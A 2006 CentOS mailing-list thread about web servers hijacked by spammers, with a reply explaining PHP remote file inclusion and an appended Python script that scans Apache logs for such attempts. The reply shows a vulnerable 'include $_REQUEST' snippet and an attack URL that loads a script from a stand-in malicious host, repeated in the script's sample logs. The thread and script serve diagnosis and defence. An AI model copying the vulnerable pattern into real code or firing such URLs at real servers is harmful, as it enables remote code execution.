On Thursday 22 June 2006 13:16, Nicolas Ross wrote:
> > Hello, I have a server running CentOS 4.3 with all the latest updates.
> > The server in question has been hacked by spammers a few times. The
> > details of the hack have been basically the same every time. I find some
> > directory created by the apache user account in /tmp. The new directory
> > contains an html file, and a list of email addresses to spam and a perl
> > script that spams all those email addresses with the html file.
> >
> > My question is why is this happening? Obviously it's some apache
> > exploit. I have removed mod_perl, that didn't help. I have now changed
> > the permissions on the perl executable, that might help, we will see, but
> > that doesn't address the core problem. How is it that someone can upload
> > arbitrary files to my server and then execute an arbitrary command via
> > apache.
> >
> > Is this a known problem? Have others seen it? What can I do to help
> > prevent this?
>
> I've also been hacked a couple of times with this sort of exploit. In my
> case, it was an exploit in awstats, a weblog analyser. If you have it, I
> strongly suggest you get up to the latest version...
>
> Also, if you have php scripts installed, they are a frequent source of
> security holes.
>
> Nicolas
>
> _______________________________________________
> CentOS mailing list
> CentOS@xxxxxxxxxx
> http://lists.centos.org/mailman/listinfo/centos

All the hacks I've seen on my webservers were a combination of bad
programming in php scripts and allow_url_fopen. I've seen things like

    else {
        include $_REQUEST["param"];
    }

so one could simply modify a url

    http://example.com/bad-script.php?param=http://link.to.a.malicious.script/script.php

From there you can put any local exploit code in script.php. Disabling the
allow_url_fopen will help you secure this a bit. Just check your apache logs,
you should be able to find interesting information in there. I've seen this
quite a few times.

I hope this can help someone.
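
The log check suggested in the reply above, as an added example that is not part of the original thread: it scans Apache access-log lines for requests where a query parameter's value is itself a remote URL, which is what the include pattern shown in the reply leaves behind. The function name, the assumption of the common/combined log format, and the sample log lines (constructed, using documentation IP ranges) are all assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A query value that is itself a remote URL is the trace left by the
# include-by-URL pattern described in the thread.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jun/2006:12:01:07 -0400] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Jun/2006:12:03:44 -0400] "GET /bad-script.php?param=http://link.to.a.malicious.script/script.php HTTP/1.1" 200 312',
    '198.51.100.7 - - [22/Jun/2006:12:03:51 -0400] "GET /bad-script.php?param=http%3A%2F%2Flink.to.a.malicious.script%2Fscript.php%3F HTTP/1.1" 200 298',
    '203.0.113.5 - - [22/Jun/2006:12:05:02 -0400] "GET /redirect.php?next=/home HTTP/1.1" 302 -',
]


def find_remote_include_attempts(lines):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        target = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "path": target.path,
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                })
    return hits


if __name__ == "__main__":
    for hit in find_remote_include_attempts(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["path"], hit["param"], hit["value"])
```

Each hit is a candidate for review: a script that legitimately accepts a URL parameter will also show up, so compare the reported path and parameter against what the script does with the value.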